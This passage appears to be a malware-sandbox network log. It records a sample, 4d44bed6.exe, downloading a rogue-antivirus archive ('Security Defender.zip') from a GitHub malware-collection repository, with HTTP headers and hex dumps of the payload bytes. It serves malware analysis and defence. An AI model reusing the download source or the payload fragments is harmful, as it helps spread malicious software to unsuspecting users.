                                                                                                                                                2022-09-29 12:51:52 UTC30381INData Raw: 7f ee 8f aa 82 90 73 86 f8 9d c8 c1 08 78 65 e7 71 24 02 53 2b 7f d5 eb f6 18 10 10 e0 16 fe 48 b2 55 2f 95 b3 39 ee aa ca 9f ad 78 c4 aa 11 2a 44 83 64 f1 84 54 72 f7 cd 0c 66 9c fb a0 c4 ee 37 e1 cf 7f a8 de 17 cd 79 a5 57 2a ac e0 68 f8 49 91 7b 74 8a 54 cc e8 c7 9a ae 9f 8f b4 b8 4b ce 26 50 b0 05 a8 37 e8 84 9f 21 fe 12 3c 23 76 c0 06 54 eb c7 58 bd b4 a8 24 57 da 5d ec a6 c3 74 46 b7 02 60 05 90 bf f7 7f 7a 34 c4 1e ff ea 13 06 6e 8e f1 b6 6f f7 19 f8 90 db 37 49 f5 09 33 e6 78 dd e8 2b 72 64 b3 77 f2 8c d0 39 fa 0b f2 b5 80 6c 93 79 10 56 d4 64 2e 52 bf b9 7a 98 43 0c 19 be 22 a0 f8 cd fe c8 64 fe a4 f4 61 3b be 73 4d 8c f0 c5 d0 7a 33 2a 2e c9 11 de f6 86 65 84 41 6c d0 c2 6c 67 b7 b0 99 db 9f 47 b6 8c 2d 9b 8e 82 03 0f 1f aa dd d3 99 6a b0 b9 da
                                                                                                                                                Data Ascii: sxeq$S+HU/9x*DdTrf7yW*hI{tTK&P7!<#vTX$W]tF`z4no7I3x+rdw9lyVd.RzC"da;sMz3*.eAllgG-j
                                                                                                                                                2022-09-29 12:51:52 UTC30397INData Raw: de 83 9f 6b 80 e1 26 b0 bc 8f 05 2e 3d c3 10 81 e2 73 5e 12 a0 40 ff a8 13 55 4d d5 ce de 67 d2 2d 88 2a fa 2e 3f f7 64 5c a0 d8 a0 36 5a ca 4c 80 07 47 c9 8a da 1e b9 33 5c e9 9b 44 15 e7 ac 0f 16 45 2b 3b 27 36 34 4f 25 83 94 6f a2 9e e6 73 5d 8c bd 94 ae 95 00 f8 dd 9d 8b c4 a5 77 0f d4 4d 96 64 54 aa e0 74 51 2f 1a 3a e4 a8 54 39 0e b5 0c 37 9b ed 64 35 54 bf 65 7f a9 b8 b7 c9 b6 53 dd cf de 68 ba a3 ac f1 7c 65 75 bd 97 a4 b7 0e 1a c6 de ec 0f d9 8d 9e 03 67 fe 53 f2 1f 3f 13 44 66 db 32 9e a1 bb e2 3e 33 00 bd 0d bf 40 bd b1 99 28 4c a5 7c 33 b7 c5 99 eb 6d c0 fd 23 47 f9 de 47 7f f8 4b de 2d c5 c8 e4 8f fc 00 9a 7f 58 99 72 51 f1 69 a4 dd e4 0c bc 2d 59 ae cb a6 3f 54 0f 03 88 c5 bf 0d f8 7a 15 cd 92 4c 70 b1 19 5b a5 78 94 4e 99 7f 03 93 72 aa 31
                                                                                                                                                Data Ascii: k&.=s^@UMg-*.?d\6ZLG3\DE+;'64O%os]wMdTtQ/:T97d5TeSh|eugS?Df2>3@(L|3m#GGK-XrQi-Y?TzLp[xNr1
                                                                                                                                                2022-09-29 12:51:52 UTC30413INData Raw: bf c3 8c 5d df d8 bf 9c 6c 43 ee 7f f5 5e 8a c6 db f4 4e fc 9f 3e b3 75 76 d2 f9 f3 72 a3 db 19 29 2b 6e ec f3 61 2a 8f 4f 05 d4 92 dd cd 43 04 91 12 06 9d ce d1 70 26 d8 b7 1b b1 ea e1 8e 4b 9e 69 d4 33 62 9d 5a b2 8f e4 bc bc 97 99 59 79 83 4a 12 b4 94 e1 87 98 d2 ef 9c 6a 54 6d 93 63 47 1d b1 b6 b0 8d e7 ca 28 fa 1c 12 27 d6 19 39 9c f5 b7 57 92 22 5e 84 28 76 c6 66 6f f1 d8 6a 3d 3f c4 98 1c fb 45 8b 5a ea cf 3d 75 57 cd 7e be 32 d2 35 1b ac 41 65 9b d1 a9 b1 9f 88 19 d6 80 b6 74 13 6c 46 8b 14 30 42 0f 33 54 06 f5 98 e2 ea b8 06 b6 c2 9b 5b dc 5e fe 38 29 85 a1 5a a1 4d d9 2b c3 db df 51 de 55 b0 11 0d 85 92 e3 c4 ed 16 3e f4 02 65 cc b3 f8 1a d4 a6 6f 4c 86 38 72 10 53 4c f8 3d e6 3a 1f 57 1f 06 0f 30 d5 15 11 51 c6 a4 51 2f 70 46 54 15 c9 72 0c d3
                                                                                                                                                Data Ascii: ]lC^N>uvr)+na*OCp&Ki3bZYyJjTmcG('9W"^(vfoj=?EZ=uW~25AetlF0B3T[^8)ZM+QU>eoL8rSL=:W0QQ/pFTr
                                                                                                                                                2022-09-29 12:51:52 UTC30429INData Raw: 68 bd 93 1a 7d 77 4b ef 1c b4 6d 15 77 8b e4 03 32 46 88 03 26 fa 08 0c ab 4b 2e 57 e1 9f fe 8c 7a 76 90 3c 51 43 44 19 d0 d4 2a 65 78 ac 92 ee 6f e4 6b 0c e6 aa c8 ce af e0 76 51 9f 77 60 bb 5a fc dc 8c 03 35 45 68 f1 fc c7 3e 4b ab 81 cc 3f 95 c2 1a cd b3 63 1e bb 1a 13 05 e4 7c 96 d4 d0 97 c1 8d 89 b5 c6 45 7f fb f5 fd c1 b6 06 72 4e cd cd 91 08 35 90 e7 7b 7f 5c e0 57 8f 71 6d 9b 71 f9 df f1 c9 43 2f 42 56 0a 34 10 20 a9 ea a6 6c 89 14 75 54 03 9c 69 09 b5 2c 38 f2 2d 43 48 a0 e1 bb 32 07 6e c7 03 d0 df 1d 18 fc c2 23 50 aa 49 24 32 05 e2 a7 0e b6 ed a2 4b 9f dd a0 13 67 47 7a f4 68 9c 28 8a 86 66 89 2b 0b f8 7a 37 52 80 14 60 92 e6 c8 d4 d0 0f 40 10 8d a4 9f 63 dd c7 c9 f9 9f 84 c4 db 92 d7 93 c2 34 a2 d3 f0 11 9d 9c 46 50 1e 72 0e 7d b1 23 e5 fe fe
                                                                                                                                                Data Ascii: h}wKmw2F&K.Wzv<QCD*exokvQw`Z5Eh>K?c|ErN5{\WqmqC/BV4 luTi,8-CH2n#PI$2KgGzh(f+z7R`@c4FPr}#
                                                                                                                                                2022-09-29 12:51:52 UTC30445INData Raw: 06 08 3f a6 a3 0c 48 4f 94 af bd 6f 72 08 d9 f6 ff cc 7b 4a c8 5d 10 f8 80 21 b9 ca 3c ae 38 e0 62 3a b7 f3 d9 c8 5c fe 7e d7 c6 b4 d3 45 d7 13 81 66 23 5c 68 98 cd 73 72 a1 79 cf 0b 05 c1 ad d2 1e 0f c1 6f 16 57 ca 7f 8f ad 90 ca d0 f4 e9 5c 29 1f 0e ed 2c 07 72 bd de 3e 69 73 85 23 22 99 b1 c2 f5 3e 19 c7 a8 c8 2b 14 52 d8 d5 11 8e f0 b7 00 f8 39 25 7b 20 6a d5 f3 d8 42 33 0e a1 91 d0 5d 29 15 55 67 ba b1 15 e2 37 9e 23 0b 45 94 97 4f e4 6e 76 65 da cf ed 8e 33 59 8b e5 bb 2b 24 1c a2 10 fe a2 e3 8b 4b 99 5b 01 7e 6c f4 1e 1e af 74 9f 9c 8f f4 70 00 11 f0 33 31 a6 81 e7 ed fd 2d 5c 2b 48 52 9b 6c 81 65 ae 5a 43 36 e2 3c 9a a1 47 97 34 78 97 cb 4f 70 51 aa 7b c0 96 11 c0 12 8f 91 cf 17 b1 40 32 7c 99 d0 f8 85 94 3f 86 64 18 3e 10 a2 4e e9 68 2f 28 6e a8
                                                                                                                                                Data Ascii: ?HOor{J]!<8b:\~Ef#\hsryoW\),r>is#">+R9%{ jB3])Ug7#EOnve3Y+$K[~ltp31-\+HRleZC6<G4xOpQ{@2|?d>Nh/(n
                                                                                                                                                2022-09-29 12:51:52 UTC30461INData Raw: 0e b3 db 27 6b 2d c5 1e 6f 71 89 48 c9 af 29 f3 e7 ce 0a b2 1e 92 59 86 02 4e 87 a6 df 46 5f a3 41 11 cf 3c 2b 02 bb 7e 39 9b 92 15 39 c4 e3 f8 19 28 ae 7b c4 f3 16 79 84 1e 28 6d c3 ac c2 62 46 de 60 c5 77 09 3f be 63 c5 ee 85 65 76 f3 7b 55 7e 74 c9 92 b0 a8 c1 6a 12 7b 41 76 f0 5d ea ec 88 3f d8 1a 82 34 e4 3d da 15 f5 f8 a4 04 f0 89 ee 43 91 86 d3 3d 2d e3 6b 54 00 cc ab 7e 54 32 28 81 f2 d3 b2 be 88 59 b2 c9 d1 5a e8 cf 30 6d 2f 16 0b 32 b9 fa 2f a3 6c 7a b2 b0 15 ca 7a 41 8b 0b df 18 e2 4c ad aa e2 b1 b6 ba 74 17 90 0b 2a 1e 80 cb d7 8b 06 99 51 d6 b3 89 16 a8 3d 46 75 96 06 97 d7 aa 10 b8 64 5c 5a fe 0d 66 99 c1 30 74 d2 6b 31 0a 6f e0 75 e4 98 37 e1 4a ca 58 27 c5 47 74 52 6d 8d c1 70 3b 1b 51 b7 ca 8c 15 12 4b a0 17 e3 c3 b1 26 ec 3d 52 96 78 30
                                                                                                                                                Data Ascii: 'k-oqH)YNF_A<+~99({y(mbF`w?cev{U~tj{Av]?4=C=-kT~T2(YZ0m/2/lzzALt*Q=Fud\Zf0tk1ou7JX'GtRmp;QK&=Rx0
                                                                                                                                                2022-09-29 12:51:52 UTC30477INData Raw: e8 5b 53 8f fc 93 15 e1 6f 9e 7e 7a 99 ab 9c 27 86 89 32 ff 7f 86 5d af c8 fc 11 87 d1 10 ac ad 83 a5 ab 11 ab 44 19 58 9b 9f 2a 9e 2c bf b9 96 f1 44 be 54 9a 05 80 23 46 2a 78 93 59 7f 75 a0 7e 65 fa 14 78 5b 4a 95 31 4d 61 57 a3 cc 16 60 fa 06 7c 94 06 dd a3 20 3c f4 5d 17 ab b3 44 b4 23 5a 40 31 eb 88 b5 48 00 cf ed f2 33 6d f3 73 80 2d 6e 12 c4 6a d1 d1 a1 64 02 a3 20 38 9f 8e c5 b4 a0 e0 9c 7c bd b6 21 22 42 a1 23 19 74 b4 e4 a9 d6 ee 8e 40 c8 88 5c 50 a1 d5 fa aa a1 da 1b 8d 24 21 d3 90 71 91 7b 52 48 a4 33 d2 d9 66 52 1a b1 c6 c8 d1 fb 8a 67 0f f9 01 df ea 39 cc fa f1 5b 6f 23 c3 04 c8 30 84 57 c2 b7 27 67 85 5d 5f 0a 2d 69 5e a2 91 49 bc 68 85 6c 47 62 b5 38 d8 3f f1 0c fb d2 08 59 96 83 60 47 77 b4 9d 4b 0d 83 9b 03 15 a8 16 0c ab 2d 84 7c ca de
                                                                                                                                                Data Ascii: [So~z'2]DX*,DT#F*xYu~ex[J1MaW`| <]D#Z@1H3ms-njd 8|!"B#t@\P$!q{RH3fRg9[o#0W'g]_-i^IhlGb8?Y`GwK-|
                                                                                                                                                2022-09-29 12:51:52 UTC30493INData Raw: 0a d3 ed be b3 61 b8 b8 e2 7e 73 a1 be e3 aa ab 8c 73 85 d8 6e bd 14 88 3a 7e 06 13 01 a9 77 1f 93 27 6c 9d 2e e8 75 f6 05 27 a6 f1 60 a9 24 70 af 07 0e 7b 4b 1d e5 de cb 27 12 e4 7f 14 7a 2c 3b b8 78 2f d3 8b 2e 3c 41 32 ac 39 7b 02 c3 d9 e9 69 e0 60 4b a5 a2 0e 59 d4 83 64 cd f4 74 de ca 4f 40 9f 84 15 d0 dc 8c be b2 b8 0c 91 45 71 1f ae 14 b9 2f 97 9d b4 44 cf 3c 02 74 0c 3b c8 0e fd 88 cf 06 9d bb e3 69 b9 7e 39 0f f5 56 27 bf f5 d7 34 05 fc 4f ab 35 f6 b0 6b 79 88 9e 12 f6 05 57 63 e7 10 03 7d be 14 95 67 ac fb cb 5c bd 38 08 5d ae da b6 ac b4 ca 22 75 b5 8c d9 cf de 0e 37 c5 a4 e8 aa b6 da 15 c4 4a d0 40 68 f8 10 98 72 d4 84 0c 41 5c 22 85 34 ed 2f e9 af 15 d0 a1 57 ab af ee 4c 64 da c2 d4 89 84 1f f0 cd 2a 5d f7 46 e8 3c 1e 66 f4 ee 34 93 f4 0b 77
                                                                                                                                                Data Ascii: a~ssn:~w'l.u'`$p{K'z,;x/.<A29{i`KYdtO@Eq/D<t;i~9V'4O5kyWc}g\8]"u7J@hrA\"4/WLd*]F<f4w
                                                                                                                                                2022-09-29 12:51:52 UTC30509INData Raw: f9 50 9c b0 97 c7 6a 76 70 92 3e 81 72 87 44 01 54 78 95 2f 58 f7 51 c9 94 ae 9d f5 ee e4 cf 4c 72 a1 2b 26 11 65 cc b7 18 c5 70 9a 4e 55 3a 2c 26 9d d5 30 4e 03 b8 d0 f3 46 c7 2f 65 5a cc d3 a7 79 66 20 59 7f e2 a2 b7 1c 68 28 b5 10 83 01 ef 72 71 1d 07 14 d4 19 40 cd 59 2b 45 c4 d7 77 64 c3 35 55 89 bb 8b e3 a5 88 cd 57 a7 99 1b 34 41 bc 86 60 98 bc cb 5a 29 3c f9 94 ea fa ae 49 a6 94 bc aa 67 c1 65 1a 33 87 56 aa d7 cd d7 2c 17 21 63 38 af a5 f3 07 64 72 c3 af 91 f5 59 5e 4e f6 18 fb c1 4c 73 c2 ca 7c 10 69 1d 40 06 5f 57 c6 69 7d e3 13 fe bc 28 a3 95 d8 df 98 d9 b4 6c be d5 2e 3e ee c5 0b b0 b3 9b 62 1a 34 6c 59 3f 7a 6f 57 77 78 0a af 0b 03 36 96 96 41 16 f9 72 3a bb c9 51 b9 b2 9b c0 1a 72 e1 51 f3 0f 84 33 44 f2 2f f0 52 fe cf 6b 1a 21 19 4d 93 b7
                                                                                                                                                Data Ascii: Pjvp>rDTx/XQLr+&epNU:,&0NF/eZyf Yh(rq@Y+Ewd5UW4A`Z)<Ige3V,!c8drY^NLs|i@_Wi}(l.>b4lY?zoWwx6Ar:QrQ3D/Rk!M


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                56192.168.2.549756140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:52 UTC30520OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:53 UTC30520INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:53 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:53 UTC30520INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                57192.168.2.549757185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:53 UTC30522OUTGET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:53 UTC30522INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1423299
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "4e2f97a693b42bbc4ce7b3f548d6798cfcb4829d26d0a219f2fbeb3332111530"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 080B:4559:687049:6EBFD9:63359362
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:53 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6922-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455913.283648,VS0,VE159
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 9807d4cdb4fbcdf64b217fe4cb59dd1cfa50a094
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:53 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:53 UTC30523INData Raw: 50 4b 03 04 14 00 01 00 08 00 95 9e 9e 43 97 d5 73 7c ff b6 15 00 00 f8 16 00 1f 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 44 65 66 65 6e 64 65 72 2e 65 78 65 99 68 63 5c 94 3d bf 63 47 e4 03 fb 1f c1 b9 4b 20 11 2d 75 48 62 84 af 67 6b 4a 77 75 39 5b 1d 02 85 b0 24 36 21 49 0f 58 81 53 67 5b f9 24 6a d8 ea 82 da 51 26 14 8f bd 4f dd 51 7d f0 d8 d1 cc e5 9c b9 dc 08 c1 ad ec 4e 39 18 4a 21 c9 21 be fb 52 0b 0f 59 6c 23 9f f1 34 d2 ec c1 7f 93 35 11 14 3e ab 80 17 a2 b2 24 c6 3d 5b f4 66 4a 22 1d 94 00 0e 54 5f c3 dc 4a 42 eb 35 61 3a 44 06 ba a0 fc e5 08 55 c0 85 99 e8 cd f7 78 ae 86 5d 33 30 3f 92 ef 90 fe ee c4 90 a1 df 26 b7 20 a9 1e b8 31 9e 24 00 ce c9 50 af 1a f1 9e c4 46 03 86 41 f3 24 e2 fa 15 24 a2 97 c6 0d ff 8f 21 a1 b5
                                                                                                                                                Data Ascii: PKCs|Endermanch@SecurityDefender.exehc\=cGK -uHbgkJwu9[$6!IXSg[$jQ&OQ}N9J!!RYl#45>$=[fJ"T_JB5a:DUx]30?& 1$PFA$$!
                                                                                                                                                2022-09-29 12:51:53 UTC30539INData Raw: a8 4d a3 fe 7b 7d 28 72 be 0d 6b 2e 7f 9d 52 e5 58 34 90 80 1a f4 8f 9b d1 63 e8 cb fc 75 99 d4 37 dc 2e f7 5a ef 7b f1 3d 8a f3 e3 fc a3 24 83 39 8d 15 32 43 f8 38 d4 f9 3f c3 b6 e2 2f 9e 58 6a 75 63 68 ed d3 18 02 46 a3 00 88 c2 13 35 1b 79 af 8b f9 49 8e 44 31 cc 20 ca e1 40 b8 c5 70 7a f0 15 7d 05 32 83 eb 07 8a fb 49 b1 7d b9 e7 d4 eb 6c ab ee 91 d8 23 df 11 1b 0b 26 79 85 d7 28 86 26 b8 cd 89 35 a9 a1 eb 34 fa dd 83 59 02 0d c8 ed 0c 56 d0 a5 07 d6 ae 00 6b 35 a8 d1 32 4b ae cd dc 63 ba cd ee ac 6e a3 f1 af 72 09 76 68 b1 29 a1 73 df 1d 63 24 1b f2 85 d2 91 10 f1 16 58 cc 98 5d 4d a4 de 1d 42 64 78 eb f0 b5 bf ba e7 32 d4 cc 54 d0 f2 b7 b6 de 2f d5 dd 36 fd 74 62 9f 0d 14 63 ac eb d5 dc 22 0d 20 d7 8c 26 ee a3 49 52 4c a0 c5 2e 59 68 f8 0b f8 fd c7
                                                                                                                                                Data Ascii: M{}(rk.RX4cu7.Z{=$92C8?/XjuchF5yID1 @pz}2I}l#&y(&54YVk52Kcnrvh)sc$X]MBdx2T/6tbc" &IRL.Yh
                                                                                                                                                2022-09-29 12:51:53 UTC30555INData Raw: 8f 3d d0 49 ff ca a8 04 27 59 cb ea 53 ec 60 2f ce 3f 20 f1 dd c6 39 d5 cf 67 70 33 53 3f 84 e9 1a 9d 04 3f 8e 10 10 23 1a a5 97 0a fc f6 3d 0e be 32 bb 16 f7 5b 8b 44 72 bb 06 d5 b8 1f 47 01 ad 13 5c c7 5d 49 b4 71 e7 88 3b 8e 4c 8f 2c c1 1b 84 f0 f2 0e 3c 9f 53 f5 43 93 38 5d 2d 02 f9 17 0b 91 6c b0 d7 d5 25 26 94 d7 30 e6 1e 87 6b 2b 1d c8 15 e5 38 84 21 d7 01 0f 0f 61 ab fa 5f c0 f9 b9 84 69 f1 8c 54 d0 c7 06 7c f5 a5 66 f2 09 eb ef 93 f0 7b 68 e7 95 7e cc f2 6d c5 b0 da 1c cb 2f 55 a3 5c a5 76 46 93 97 53 e1 0b 5b 2e ed 1c e3 c7 90 77 4d b2 23 98 05 46 70 69 5d 6b 9b af 19 f2 3b 0c f3 cc 7c e0 6a 62 6a 31 c1 33 0b 37 2c 3a 0e ca d8 39 37 ac 3b f8 ed a2 b6 7a 33 0a 3f 74 2b 7b a6 a3 82 c4 58 48 8d a0 67 2d 8b c0 e2 47 15 3a 80 b6 29 cd 04 84 ce b9 eb
                                                                                                                                                Data Ascii: =I'YS`/? 9gp3S??#=2[DrG\]Iq;L,<SC8]-l%&0k+8!a_iT|f{h~m/U\vFS[.wM#Fpi]k;|jbj137,:97;z3?t+{XHg-G:)
                                                                                                                                                2022-09-29 12:51:53 UTC30571INData Raw: 84 2e 0e 35 77 17 85 80 e7 30 b1 5a 92 e5 9f ae 91 8d a9 9a 7f f2 00 1e df e8 be 7e d9 be 8a 0b 34 5b 4d 78 03 67 c4 3a ea b7 1e 35 da fa d3 e5 43 63 59 b4 01 34 ca db f4 85 7e b5 4d 24 b5 2b 3c 83 73 a5 51 0c 07 f0 01 9b e9 a5 e9 cb 07 03 82 42 af d9 54 e4 0a 48 2e 97 5e 9e 38 cb 86 60 1f 54 fc a2 a7 58 e2 9b a2 b0 d0 fd eb 1e 34 52 5e 37 b3 ee f8 5a 17 db 5b e5 36 a0 12 fb 72 ce 8e 06 08 86 92 8d 9c bd 72 76 ed 25 76 ed ef 25 30 74 f5 ea 33 35 7a 6b bb e5 e0 80 a2 19 e4 66 ef cd 47 34 f5 b3 54 59 f6 fa f4 9e fe bc 71 8e 02 f2 b7 c6 13 46 ca 11 bc bd 00 e3 89 ad 32 dc 78 31 23 68 cd ed 1b 49 0b b5 d9 74 45 f2 d3 55 d8 2d 12 c9 6a 20 30 d6 20 96 67 d1 4e cf bc 67 69 e8 40 8f 7c 19 1b 0a 19 0d bf b8 34 70 7d a5 b4 ca 71 0e f9 2c 02 e8 f9 82 01 86 ec d3 97
                                                                                                                                                Data Ascii: .5w0Z~4[Mxg:5CcY4~M$+<sQBTH.^8`TX4R^7Z[6rrv%v%0t35zkfG4TYqF2x1#hItEU-j 0 gNgi@|4p}q,
                                                                                                                                                2022-09-29 12:51:53 UTC30587INData Raw: 56 2e 56 06 2e b8 1e 12 d3 a4 4a c0 97 94 eb 77 f6 0e 3d 1a cb 97 e7 cb a0 6c 73 12 2a 34 68 2c 17 00 c2 ae da 65 6c 92 d5 02 37 f5 e3 a8 c2 11 08 c0 e5 36 f0 82 09 3d 21 fb fa 85 6e a7 ea b5 dd 2e be 88 0e e1 5a dd 0a 27 2e 81 5f c6 19 05 cd bc aa 50 71 ad b3 7c 5c 74 2b b7 17 48 eb 99 6c f6 37 b1 9a bc 99 65 cd 3b 12 9b f3 fa 27 6e c1 84 32 af bf 0d c6 98 1b 09 13 e8 4b 98 c5 71 9b d6 39 de 88 41 7a a0 e1 f6 9a 35 3f b4 43 65 19 0d 6c 29 be 41 56 c7 af eb df 56 f6 6d f0 ff 04 77 f6 ae ee 63 33 1e 89 03 9e 66 94 8d 59 78 ce 25 a8 27 d1 10 83 9d 32 8d 7c b5 b4 44 9f 76 25 61 80 c5 b2 e6 88 99 b7 bc de e9 b6 e7 88 6f c1 ac 79 c0 b8 1f 4a 85 09 02 dc f7 3c 19 ce 22 b7 3c 2d e5 88 8f 76 2d 89 37 78 f6 54 ec 20 d6 fb 0d ed 34 93 ee cf b2 7f 6a c7 e1 57 83 8e
                                                                                                                                                Data Ascii: V.V.Jw=ls*4h,el76=!n.Z'._Pq|\t+Hl7e;'n2Kq9Az5?Cel)AVVmwc3fYx%'2|Dv%aoyJ<"<-v-7xT 4jW
                                                                                                                                                2022-09-29 12:51:53 UTC30603INData Raw: a9 68 1f 66 1e d5 99 e4 a4 62 93 75 30 61 7f 0c b3 8d e2 cc 1e e1 d5 30 5e e1 09 7b 69 5d 75 01 58 10 a1 7f c7 4b 0f 0f f4 b5 8f de a3 f0 89 6b f2 ca d0 b3 e1 86 ae 43 e3 f1 6a 25 72 20 58 60 e2 1b a4 48 66 92 67 fe ab 9a 2f ca 76 6a 5d 0b df f0 c6 f6 83 c2 39 ee fb 67 8f b7 49 55 26 86 5e b4 b6 91 28 5c ad 9c 45 15 94 43 ca ec b4 43 c9 4e 22 bb 26 6e 35 81 83 4e a3 61 06 f9 40 6f cf 8a 0c 65 f7 6d ec 3e 56 33 fa 28 66 d6 44 e5 db 0d 03 55 e3 d9 ff a6 e0 36 06 d0 d3 ad 1d 54 b3 a0 b2 86 ea bc a1 a5 34 84 a4 ae 07 fb 60 35 1f d1 06 67 67 f3 95 2e 64 46 93 b2 7c fa eb d7 24 2e 53 96 0b f3 2b aa c5 42 0a a2 cc 31 ac 0e cc ba 86 68 b8 6e 56 3e a3 f1 2d 6f 67 44 b4 82 e9 a7 d1 38 fc 70 cd db 78 05 0f a0 9e 6d e6 e4 ed 83 21 d3 f5 be a1 e7 ba 93 e0 21 c7 b2 18
                                                                                                                                                Data Ascii: hfbu0a0^{i]uXKkCj%r X`Hfg/vj]9gIU&^(\ECCN"&n5Na@oem>V3(fDU6T4`5gg.dF|$.S+B1hnV>-ogD8pxm!!
                                                                                                                                                2022-09-29 12:51:53 UTC30619INData Raw: 8e c0 37 0e 92 cf 07 a1 2f 94 b6 17 8e cc c2 10 a1 b2 37 c7 91 9e 37 78 93 3d a1 6d 02 7e 3a fb c6 8f 54 c1 44 4e 3d 71 ae b0 1f 13 d0 6d 26 c2 56 ca 12 34 54 c6 35 de 0b 58 a5 c0 88 f9 6b 53 ee 15 a0 a3 6b f8 7d 0f 7b 51 6b f7 19 b1 c6 da a6 1c 17 cc 0f 1b 55 44 8f e1 f6 da 65 e6 ab 87 fc 5f a6 76 e1 2d 54 4b 3f 74 54 47 e7 f8 7a 61 d1 77 de ff b3 b1 75 86 10 33 81 9e 11 91 5e 89 db 2b 81 29 fc 11 d6 85 19 30 0f 08 4a 23 3c e7 0e 9a bf 17 50 81 7f 19 9a 73 58 75 44 33 ec 1e c7 68 9b 70 19 bc 22 63 61 d2 40 cf 8d 5e 67 4a c2 c5 04 fe d1 4b 75 ce e7 1e f5 e1 16 4a 81 6f 74 71 1f c8 db 4f 8c 31 07 f3 58 5a 4d 20 63 bd be a9 3d df 8a 6b b9 0f 05 21 34 8e 2a f6 bd d9 ce 28 9f b6 ae 90 72 fd af 8d 6c 3b 36 7d e0 23 3b a9 6e 66 d5 b0 16 aa 74 aa 78 b8 14 59 d5
                                                                                                                                                Data Ascii: 7/77x=m~:TDN=qm&V4T5XkSk}{QkUDe_v-TK?tTGzawu3^+)0J#<PsXuD3hp"ca@^gJKuJotqO1XZM c=k!4*(rl;6}#;nftxY
